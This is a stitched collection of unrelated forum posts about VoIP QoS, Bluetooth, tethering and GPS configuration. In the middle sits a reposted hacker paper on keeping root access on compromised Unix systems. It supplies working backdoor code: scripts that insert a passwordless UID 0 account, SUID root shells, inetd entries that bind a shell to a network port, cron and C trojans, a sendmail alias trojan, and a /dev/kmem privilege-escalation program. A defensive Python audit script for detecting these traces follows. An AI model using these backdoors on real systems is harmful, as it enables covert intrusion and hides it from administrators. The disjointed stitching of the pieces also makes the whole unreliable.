On this page: http://msdn2.microsoft.com/en-us/library/aa926591.aspx it lists the default DSCP settings used by the RTC Client in Windows Mobile 6. The default DSCP value for SIP signalling and RTP media is 0x38 (or DSCP 56, IP Precedence 7). I wish to change this; however, adding the relevant values to the registry does not change what DSCP values are set; they always remain at 0x38:
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\Comm\RTC\QoS]
"Disabled"=dword:00000000
"DSCPSIP"=dword:00000018
"DSCPAudioRTP"=dword:0000002e
"DSCPAudioRTCP"=dword:0000002e
This should in theory set DSCP 24 (0x18) for SIP signalling packets and DSCP 46 (0x2e) for RTP & RTCP packets. I have made the registry changes, left it for a while and soft-reset. Following bootup I have checked that the settings are stored in the registry; however, if I make a call and capture the traffic I can still only see DSCP being set to 56 (0x38). Has anyone else played around with the QoS settings?
I am using version 5.2.318 (Build 15342) with the replacement VoIP files to get around the issue with L2TP/IPSec.
Andy
VoipSipSdk
I am now looking for VoIP solutions, and found information about the VoIP SDK.
According to their website www.voipsipsdk.com
the VoIP SDK is based on IETF standards (SIP, STUN, etc.), so it should be compatible with other standards-based products such as Asterisk, OpenSER and others.
They have all the features I need:
# Dynamically loadable codecs
# Registrar support
# Play wav files into conversation
# Record conversation into file
# Hold/Retrieve call
# Forward Call (Blind Call Transfer)
# Transfer Call (Attended Transfer)
# Mute Sound
# VPN support
# Noise reduction
# Auto gain
# Jitter buffer parameters
# Samples on Delphi, C#, VB, VB.NET, C++ 2005, C++ 6.0, HTML (SIP ActiveX)
# Windowless samples on C++ and .NET
# DTMF
# Adaptive silence detection
# Adaptive jitter buffer
# STUN support
# Comes as ActiveX control
But before I download the evaluation version I would like to hear about other people's experience.
Hi everybody,
I'm developing on a Pandaboard ES. I compiled AOSP 4.0.4 and a kernel from scratch, and everything is working quite well so far.
As I need to connect some weird bt-devices I have to change the default bt-class.
This is what I get from hciconfig -a:
Code:
/ # hciconfig -a
hci0: Type: BR/EDR Bus: UART
BD Address: 1C:E2:XX:XX:XX:XX ACL MTU: 1021:4 SCO MTU: 180:4
UP RUNNING PSCAN
RX bytes:2148 acl:0 sco:0 events:92 errors:0
TX bytes:1472 acl:0 sco:0 commands:92 errors:0
Features: 0xff 0xfe 0x2d 0xfe 0xdb 0xff 0x7b 0x87
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF
Link mode: SLAVE ACCEPT
Name: 'BlueZ'
Class: 0x1a0000
Service Classes: Networking, Capturing, Object Transfer
Device Class: Miscellaneous,
HCI Version: 4.0 (0x6) Revision: 0x0
LMP Version: 4.0 (0x6) Subversion: 0x1f22
Manufacturer: Texas Instruments Inc. (13)
By default there is no main.conf in /etc/bluetooth/. But I can find two different ones in the sources from where I'm compiling.
1: /external/bluetooth/bluez/src/main.conf
2: /system/bluetooth/data/main.conf
I modified one, pushed it to the pandaboard and rebooted, but the file is ignored. Neither the class nor the name change as expected.
Changing the class with hcitool works, but this is, of course, not permanent. (When changing the class I can connect my "weird" device without problems.)
Why is the file ignored? File owner and rights are the same as on my Nexus S. Here the file exists. (Unfortunately I can't check if it's really parsed here, because it's my productive phone, so it is unrooted and stock 4.0.4)
Below you find the content of /etc/bluetooth and main.conf which I pushed to the pandaboard.
Code:
/ # ls -al /etc/bluetooth/
-r--r----- bluetooth bluetooth 1699 2012-05-11 10:31 audio.conf
-rw-r----- system system 1536 2012-05-11 10:31 auto_pairing.conf
-r--r--r-- net_bt net_bt 401 2012-05-11 10:31 blacklist.conf
-r--r----- bluetooth bluetooth 262 2012-05-11 10:31 input.conf
-r--r--r-- bluetooth bluetooth 2802 2012-06-25 09:44 main.conf
-r--r----- bluetooth bluetooth 120 2012-05-11 10:31 network.conf
Code:
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adaper name
# %h - substituted for hostname
# %d - substituted for adapter id
Name = "Panda"
# Default device class. Only the major and minor device class bits are
# considered.
Class = 0x400210
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 120
# How long to stay in pairable mode before going back to non-discoverable
# The value is in seconds. Default is 0.
# 0 = disable timer, i.e. stay pairable forever
PairableTimeout = 0
# Use some other page timeout than the controller default one
# which is 16384 (10 seconds).
PageTimeout = 8192
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Defaults is 30.
DiscoverSchedulerInterval = 30
# What value should be assumed for the adapter Powered property when
# SetProperty(Powered, ...) hasn't been called yet. Defaults to true
InitiallyPowered = true
# Remember the previously stored Powered state when initializing adapters
RememberPowered = true
# Use vendor, product and version information for DID profile support.
# The values are separated by ":" and VID, PID and version.
DeviceID = android:generic:1.5
# Do reverse service discovery for previously unknown devices that connect to
# us. This option is really only needed for qualification since the BITE tester
# doesn't like us doing reverse SDP for some test cases (though there could in
# theory be other useful purposes for this too). Defaults to true.
ReverseServiceDiscovery = true
# Enable name resolving after inquiry. Set it to 'false' if you don't need
# remote devices name and want shorter discovery cycle. Defaults to 'true'.
NameResolving = true
# Enable runtime persistency of debug link keys. Default is false which
# makes debug link keys valid only for the duration of the connection
# that they were created for.
DebugKeys = false
# Enable Low Energy support if the dongle supports. Default is false.
# Enable/Disable interleave discovery and attribute server over LE.
EnableLE = false
# Enable the GATT Attribute Server. Default is false, because it is only
# useful for testing. Attribute server is not enabled over LE if EnableLE
# is false.
AttributeServer = false
# The link policy for connections. By default it's set to 0x000f which is
# a bitwise OR of role switch(0x0001), hold mode(0x0002), sniff mode(0x0004)
# and park state(0x0008) are all enabled. However, some devices have
# connection stability issue or fail to setup SCO when the link is in park
# state, which requires park state bit cleared.
DefaultLinkPolicy = 0x000f
bump
Nobody has an idea?
Bumping this a last time as this topic is still not solved.
Any help would be great.
Hey All,
Hope this hasn't been covered. I did search a bit and found some clues, but not something that totally worked for me. I figured I'd put up a post telling y'all how I made it work. I suppose this post is just more clues for somebody else, but at least it seems like a different set of clues than what I was able to find.
I've wanted to use the phone's USB connection to use work's Internet connection to download updates to my phone and conserve my measly 2GB/month data.
Running Cyanogenmod 9.1.0. Don't know how this would translate to others.
The tricks to reverse USB tether are
A) Get the phone to connect to a Linux host over the USB as in a normal tether
B) Set up IP forwarding and NAT on the Linux host (which has a perfectly fine Ethernet connection to the Internet)
C) Change the phone's default route to point at the Linux host
D) Change the phone to use the same DNS servers visible to the Linux host
A-C were pretty easy. D was actually the hardest. Here's my notes I'm storing on the phone:
***********************************************************************
* On the linux host
# ip addr show
2: p2p1: ...
inet 10.2.59.107/18 brd 10.2.63.255 scope global p2p1
7: usb0: ...
inet 192.168.42.151/24 brd 192.168.42.255 scope global usb0
* This part is classic "setting up a NAT" which is easily googled.
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o p2p1 -j MASQUERADE
# iptables -A FORWARD -i p2p1 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
# iptables -A FORWARD -i usb0 -o p2p1 -j ACCEPT
* This tells us some IP addresses to use as nameservers.
# cat /etc/resolv.conf
nameserver 10.2.10.24
nameserver 10.2.10.26
***********************************************************************
* On the android device disable all other methods of accessing the internet.
* That is, turn off Wi-Fi and System Settings, Wireless & networks, Mobile
* networks, Uncheck "Data enabled". This might not be necessary. I did it to
* make sure the rest of what I was doing worked.
* Try 'ip route' without other args and delete any existing default route if
* you have one.
# ip route add default via 192.168.42.151 dev rndis0
# getprop | grep dns
[net.change]: [net.dns2]
[net.dns1]: [172.26.38.1]
[net.dns2]: [172.26.38.2]
[net.dnschange]: [1]
[net.rmnet_sdio0.dns1]: []
# setprop net.dns1 10.2.10.24
# setprop net.dns2 10.2.10.26
* * Avoid the Primrose Path. This sort of acted like it would work, but then
* * didn't at all.
*
* # cat /emmc/resolv_work.conf
* nameserver 10.2.10.24
* nameserver 10.2.10.26
*
* # pkill dnsmasq
* # dnsmasq -d -r /emmc/resolv_work.conf
I thought this was an interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.
After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of reentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system,
they offer reentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you get the idea
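Most of the entries the paper lists leave a trace in a plain-text system file, so an administrator can scan for them. The following is an added example, not part of the quoted paper or of the post: a Python audit covering items [1]-[6], [8] and [9]. The function names are hypothetical, and the sample data is constructed around the entries the paper quotes.

```python
"""Audit Unix config files for the persistence traces described above.
Added example; the sample data is constructed and comes from no real host."""
import os
import stat

SHELLS = {"sh", "csh", "tcsh", "ksh", "bash", "zsh"}


def _records(text):
    """Yield (line_number, line) for non-blank, non-comment lines."""
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line and not line.startswith("#"):
            yield number, line


def audit_passwd(text):
    """Items [1], [2], [6]: extra UID 0 accounts, empty password fields."""
    findings = []
    for number, line in _records(text):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((number, "malformed entry (expected 7 fields)"))
            continue
        name, password, uid = fields[:3]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((number, f"UID 0 account other than root: {name}"))
        if password == "":
            findings.append((number, f"empty password field: {name}"))
    return findings


def audit_inetd(text, known_services):
    """Items [4], [5]: entries that spawn a shell or are not in the baseline."""
    findings = []
    for number, line in _records(text):
        fields = line.split()
        service = fields[0]
        if service not in known_services:
            findings.append((number, f"service not in baseline: {service}"))
        # User, program and argv[0] columns: also catches a missing user column.
        for column in fields[4:7]:
            if os.path.basename(column) in SHELLS:
                findings.append((number, f"{service} runs a shell: {column}"))
                break
    return findings


def audit_aliases(text):
    """Item [9]: aliases that pipe incoming mail into a program."""
    findings = []
    for number, line in _records(text):
        name, _, targets = line.partition(":")
        for target in targets.split(","):
            target = target.strip().strip('"')
            if target.startswith("|"):
                findings.append((number, f"alias {name.strip()} pipes to {target[1:]}"))
    return findings


def audit_setid(directory):
    """Items [3], [8]: set-UID/set-GID regular files under e.g. /tmp."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for entry in files:
            path = os.path.join(root, entry)
            mode = os.lstat(path).st_mode
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(mode))))
    return hits


# Constructed samples; the flagged lines reuse the entries quoted in the paper.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/sh\n"
    "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/sh\n"
)
SAMPLE_INETD = (
    "ftp stream tcp nowait root /usr/etc/ftpd ftpd\n"
    "daytime stream tcp nowait /bin/sh sh -i\n"
    "jdevil stream tcp nowait /bin/sh sh -i\n"
)
SAMPLE_ALIASES = 'postmaster: root\ndecode: "|/usr/bin/uudecode"\n'

if __name__ == "__main__":
    results = audit_passwd(SAMPLE_PASSWD) + audit_aliases(SAMPLE_ALIASES)
    results += audit_inetd(SAMPLE_INETD, {"ftp", "daytime"})
    print(*results, sep="\n")
```

A point-in-time scan like this cannot see the timed swaps in [7] and [12] or the modified binaries in [10]; those call for file-integrity monitoring of the kind the paper itself names (tripwire).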
So I had been having problems with my GPS getting a fix when using Maps etc. It was getting a fix with High Accuracy mode but with Device Only mode it wasn't working.
So I tried to tinker with the gps.conf file located in /system/etc/
You need root access for this.
Make a backup of /system/etc/gps.conf file
Go to http://www.pool.ntp.org/en/ and get the address of the server nearest to you. E.g. Mine is pk.pool.ntp.org for Pakistan.
Using your favorite text editor, open the file gps.conf
Code:
#Uncommenting these urls would only enable
#the power up auto injection and force injection(test case).
#XTRA_SERVER_1=http://xtra1.gpsonextra.net/xtra.bin
#XTRA_SERVER_2=http://xtra2.gpsonextra.net/xtra.bin
#XTRA_SERVER_3=http://xtra3.gpsonextra.net/xtra.bin
#
XTRA_SERVER_1=http://xtra1.gpsonextra.net/xtra2.bin
XTRA_SERVER_2=http://xtra2.gpsonextra.net/xtra2.bin
XTRA_SERVER_3=http://xtra3.gpsonextra.net/xtra2.bin
# Error Estimate
# _SET = 1
# _CLEAR = 0
ERR_ESTIMATE=0
#Test
NTP_SERVER=time.gpsonextra.net
#Asia
[color=blue] # NTP_SERVER=asia.pool.ntp.org[/color]
#Europe
# NTP_SERVER=europe.pool.ntp.org
#North America
# NTP_SERVER=north-america.pool.ntp.org
# DEBUG LEVELS: 0 - none, 1 - Error, 2 - Warning, 3 - Info
# 4 - Debug, 5 - Verbose
# If DEBUG_LEVEL is commented, Android's logging levels will be used
DEBUG_LEVEL = 2
# Intermediate position report, 1=enable, 0=disable
INTERMEDIATE_POS=0
# supl version 1.0
SUPL_VER=0x10000
# Emergency SUPL, 1=enable, 0=disable
SUPL_ES=1
# GPS Capabilities bit mask
# SCHEDULING = 0x01
# MSB = 0x02
# MSA = 0x04
# ON_DEMAND_TIME = 0x10
# GEOFENCE = 0x20
# default = ON_DEMAND_TIME | MSA | MSB | SCHEDULING | GEOFENCE
CAPABILITIES=0x37
# Accuracy threshold for intermediate positions
# less accurate positions are ignored, 0 for passing all positions
# ACCURACY_THRES=5000
################################
##### AGPS server settings #####
################################
# FOR SUPL SUPPORT, set the following
# SUPL_HOST=supl.host.com or IP
# SUPL_PORT=1234
# FOR C2K PDE SUPPORT, set the following
# C2K_HOST=c2k.pde.com or IP
# C2K_PORT=1234
####################################
# LTE Positioning Profile Settings
####################################
# 0: Enable RRLP on LTE(Default)
# 1: Enable LPP_User_Plane on LTE
# 2: Enable LPP_Control_Plane
# 3: Enable both LPP_User_Plane and LPP_Control_Plane
LPP_PROFILE = 0
################################
# EXTRA SETTINGS
################################
# NMEA provider (1=Modem Processor, 0=Application Processor)
NMEA_PROVIDER=0
# Mark if it is a SGLTE target (1=SGLTE, 0=nonSGLTE)
SGLTE_TARGET=0
##################################################
# Select Positioning Protocol on A-GLONASS system
##################################################
# 0x1: RRC CPlane
# 0x2: RRLP UPlane
# 0x4: LLP Uplane
A_GLONASS_POS_PROTOCOL_SELECT = 0
Remove the # symbol at the start of the blue line and replace asia.pool.ntp.org with the nearest country server address.
Reboot and the GPS should fix faster.
Can you make an app like FasterGPS?
I use it to add Pakistan quickly, but the issue is it only adds the pk.pool.ntp.org and pool.NTP.org servers and removes all gpsonextra.net servers
---------- Post added at 01:54 PM ---------- Previous post was at 01:32 PM ----------
Can you make an app for this like FasterGPS?
The issue with the FasterGPS app is that it removes all timeonextra.net servers
I want to use it for Pakistan as well